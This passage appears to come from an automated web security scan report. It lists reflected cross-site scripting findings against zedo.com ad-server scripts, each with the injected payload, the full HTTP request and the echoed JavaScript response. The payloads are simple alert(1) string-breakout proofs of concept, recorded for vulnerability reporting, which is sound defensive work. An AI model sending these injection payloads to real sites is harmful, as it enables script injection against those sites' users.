if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd =='undefined'){var zzIdxTrd ='';}
el
...[SNIP]...
ed' || zzIdxClk.length == 0) { var zzIdxClk =''; }
else { zzIdxClk = 'se=' + zzIdxClk;}
if (typeof ainfo == 'undefined' || ainfo.length == 0) { var ainfo =''; }

var zzLogData ="a=602889;x=3869;g=172,0fe8af";54ceb3db781;c=951000002,951000002;i=0;n=951;s=2;" + zzStr;

function zzPop() {
   var zzAg = navigator.userAgent.toLowerCase();
   var zzAOL = (zzAg.indexOf('aol') != -1);
   var zzNS6 = (zzAg.indexOf('netscape6/6.')
...[SNIP]...

4.268. http://d3.zedo.com//ads2/k/602889/3869/172/0/951000002/951000002/0/951/2//1000014/i.js [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://d3.zedo.com
Path:	//ads2/k/602889/3869/172/0/951000002/951000002/0/951/2//1000014/i.js

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e4da"%3bd2aaaf873b8 was submitted in the REST URL parameter 7. This input was echoed as 4e4da";d2aaaf873b8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET //ads2/k/602889/3869/172/0/9510000024e4da"%3bd2aaaf873b8/951000002/0/951/2//1000014/i.js HTTP/1.1
Host: d3.zedo.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=951;c=2;s=2;d=15;w=1;h=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; ZFFAbh=749B826,20|1483_758#365; ZCBC=1; FFgeo=5386156; aps=2; FFpb=1220:4f791'$951:ibnetwork300x250; FFcat=826,187,9:951,2,9:951,7,9:1220,101,9; FFad=3:1:1:0; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294,2#776116#653213|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:0,27,2; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Vary: Accept-Encoding
Content-Type: application/x-javascript
X-Varnish: 2884311318
Cache-Control: max-age=2591965
Expires: Mon, 28 Feb 2011 01:58:53 GMT
Date: Sat, 29 Jan 2011 01:59:28 GMT
Connection: close
Content-Length: 4711

var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd =='undefined'){var zzIdxTrd ='';}
el
...[SNIP]...
Clk.length == 0) { var zzIdxClk =''; }
else { zzIdxClk = 'se=' + zzIdxClk;}
if (typeof ainfo == 'undefined' || ainfo.length == 0) { var ainfo =''; }

var zzLogData ="a=602889;x=3869;g=172,0;c=9510000024e4da";d2aaaf873b8,951000002;i=0;n=951;s=2;" + zzStr;

function zzPop() {
   var zzAg = navigator.userAgent.toLowerCase();
   var zzAOL = (zzAg.indexOf('aol') != -1);
   var zzNS6 = (zzAg.indexOf('netscape6/6.') != -1);
   va
...[SNIP]...

4.269. http://d3.zedo.com//ads2/k/602889/3869/172/0/951000002/951000002/0/951/2//1000014/i.js [REST URL parameter 8] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://d3.zedo.com
Path:	//ads2/k/602889/3869/172/0/951000002/951000002/0/951/2//1000014/i.js

Issue detail

The value of REST URL parameter 8 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed1e4"%3b99b30bf642b was submitted in the REST URL parameter 8. This input was echoed as ed1e4";99b30bf642b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET //ads2/k/602889/3869/172/0/951000002/951000002ed1e4"%3b99b30bf642b/0/951/2//1000014/i.js HTTP/1.1
Host: d3.zedo.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=951;c=2;s=2;d=15;w=1;h=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; ZFFAbh=749B826,20|1483_758#365; ZCBC=1; FFgeo=5386156; aps=2; FFpb=1220:4f791'$951:ibnetwork300x250; FFcat=826,187,9:951,2,9:951,7,9:1220,101,9; FFad=3:1:1:0; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294,2#776116#653213|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:0,27,2; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Vary: Accept-Encoding
Content-Type: application/x-javascript
X-Varnish: 2859792649
Cache-Control: max-age=2592000
Expires: Mon, 28 Feb 2011 01:59:29 GMT
Date: Sat, 29 Jan 2011 01:59:29 GMT
Connection: close
Content-Length: 4711

var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd =='undefined'){var zzIdxTrd ='';}
el
...[SNIP]...
== 0) { var zzIdxClk =''; }
else { zzIdxClk = 'se=' + zzIdxClk;}
if (typeof ainfo == 'undefined' || ainfo.length == 0) { var ainfo =''; }

var zzLogData ="a=602889;x=3869;g=172,0;c=951000002,951000002ed1e4";99b30bf642b;i=0;n=951;s=2;" + zzStr;

function zzPop() {
   var zzAg = navigator.userAgent.toLowerCase();
   var zzAOL = (zzAg.indexOf('aol') != -1);
   var zzNS6 = (zzAg.indexOf('netscape6/6.') != -1);
   var zzNS7 =
...[SNIP]...

4.270. http://d3.zedo.com//ads2/k/602889/3869/172/0/951000002/951000002/0/951/2//1000014/i.js [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://d3.zedo.com
Path:	//ads2/k/602889/3869/172/0/951000002/951000002/0/951/2//1000014/i.js

Issue detail

The value of REST URL parameter 9 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8690"%3b12f58dba9e6 was submitted in the REST URL parameter 9. This input was echoed as e8690";12f58dba9e6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET //ads2/k/602889/3869/172/0/951000002/951000002/0e8690"%3b12f58dba9e6/951/2//1000014/i.js HTTP/1.1
Host: d3.zedo.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=951;c=2;s=2;d=15;w=1;h=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; ZFFAbh=749B826,20|1483_758#365; ZCBC=1; FFgeo=5386156; aps=2; FFpb=1220:4f791'$951:ibnetwork300x250; FFcat=826,187,9:951,2,9:951,7,9:1220,101,9; FFad=3:1:1:0; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294,2#776116#653213|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:0,27,2; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Vary: Accept-Encoding
Content-Type: application/x-javascript
X-Varnish: 2859792980
Cache-Control: max-age=2591961
Expires: Mon, 28 Feb 2011 01:58:51 GMT
Date: Sat, 29 Jan 2011 01:59:30 GMT
Connection: close
Content-Length: 4711

var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd =='undefined'){var zzIdxTrd ='';}
el
...[SNIP]...
0) { var zzIdxClk =''; }
else { zzIdxClk = 'se=' + zzIdxClk;}
if (typeof ainfo == 'undefined' || ainfo.length == 0) { var ainfo =''; }

var zzLogData ="a=602889;x=3869;g=172,0;c=951000002,951000002;i=0e8690";12f58dba9e6;n=951;s=2;" + zzStr;

function zzPop() {
   var zzAg = navigator.userAgent.toLowerCase();
   var zzAOL = (zzAg.indexOf('aol') != -1);
   var zzNS6 = (zzAg.indexOf('netscape6/6.') != -1);
   var zzNS7 = (zzA
...[SNIP]...

4.271. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58993'%3balert(1)//9d587b5b16b was submitted in the $ parameter. This input was echoed as 58993';alert(1)//9d587b5b16b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-401/d3/jsc/fm.js?c=7/2&a=0&f=&n=951&r=13&d=9&q=&$=58993'%3balert(1)//9d587b5b16b&s=2&z=0.43167143454775214 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365; ZCBC=1; FFgeo=5386156; FFpb=1220:4f791'; FFcat=1220,101,9; FFad=0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:4f791'$951:58993';alert(1)//9d587b5b16b;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,9:951,7,9:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1;expires=Mon, 28 Feb 2011 02:00:11 GMT;path=/;domain=.zedo.com;
ETag: "19b436a-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=190
Expires: Sat, 29 Jan 2011 02:03:21 GMT
Date: Sat, 29 Jan 2011 02:00:11 GMT
Connection: close
Content-Length: 2283

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat=',58993';alert(1)//9d587b5b16b';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,58993';alert(1)//9d587b5b16b;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;

...[SNIP]...

4.272. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ea250"%3balert(1)//213da1d65d4 was submitted in the $ parameter. This input was echoed as ea250";alert(1)//213da1d65d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-401/d3/jsc/fm.js?c=7/2&a=0&f=&n=951&r=13&d=9&q=&$=ea250"%3balert(1)//213da1d65d4&s=2&z=0.43167143454775214 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365; ZCBC=1; FFgeo=5386156; FFpb=1220:4f791'; FFcat=1220,101,9; FFad=0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:4f791'$951:ea250";alert(1)//213da1d65d4;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,9:951,7,9:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1;expires=Mon, 28 Feb 2011 02:00:08 GMT;path=/;domain=.zedo.com;
ETag: "19b436a-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=193
Expires: Sat, 29 Jan 2011 02:03:21 GMT
Date: Sat, 29 Jan 2011 02:00:08 GMT
Connection: close
Content-Length: 2283

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat=',ea250";alert(1)//213da1d65d4';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,ea250";alert(1)//213da1d65d4;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;

...[SNIP]...

4.273. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fm.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c159a'-alert(1)-'63e58f5998c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-401/d3/jsc/fm.js?c159a'-alert(1)-'63e58f5998c=1 HTTP/1.1
Host: d7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; aps=2; ZFFAbh=749B826,20|1483_759#365; FFad=32:15:42:23:13:18:2:1:1:0; ZCBC=1; ZEDOIDX=29; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792#580303|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:29,26,1:21,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:2,26,1:0,26,1; FFcat=826,187,14:951,11,14:826,187,9:951,7,9:951,7,14:951,2,9:951,2,14:826,187,7:951,7,7:1220,101,9; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:14,26,1:10,26,1; FFpb=1220:4f791'$951:spectrum728x90,burst728x90,appnexus300x250,realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250; __qca=P0-2130372027-1295906131971;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 964
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:4f791'$951:spectrum728x90,burst728x90,appnexus300x250,realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:826,187,14:951,11,14:826,187,9:951,7,9:951,7,14:951,2,9:951,2,14:826,187,7:951,7,7:1220,101,9;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:32:15:42:23:13:18:2:1:1:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "19b436a-82a5-4989a5927aac0"
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=261
Expires: Sat, 29 Jan 2011 05:30:36 GMT
Date: Sat, 29 Jan 2011 05:26:15 GMT
Connection: close

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

p9.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-401/d3;referrer='+document.referrer+';tag=d7.zedo.com/bar/v16-401/d3/jsc/fm.js;qs=c159a'-alert(1)-'63e58f5998c=1;';

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='None,4f791'';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=None,4f791';z
...[SNIP]...

4.274. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [q parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77514'%3balert(1)//51b4eb1c0b8 was submitted in the q parameter. This input was echoed as 77514';alert(1)//51b4eb1c0b8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-401/d3/jsc/fm.js?c=7/2&a=0&f=&n=951&r=13&d=9&q=77514'%3balert(1)//51b4eb1c0b8&$=&s=2&z=0.43167143454775214 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365; ZCBC=1; FFgeo=5386156; FFpb=1220:4f791'; FFcat=1220,101,9; FFad=0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
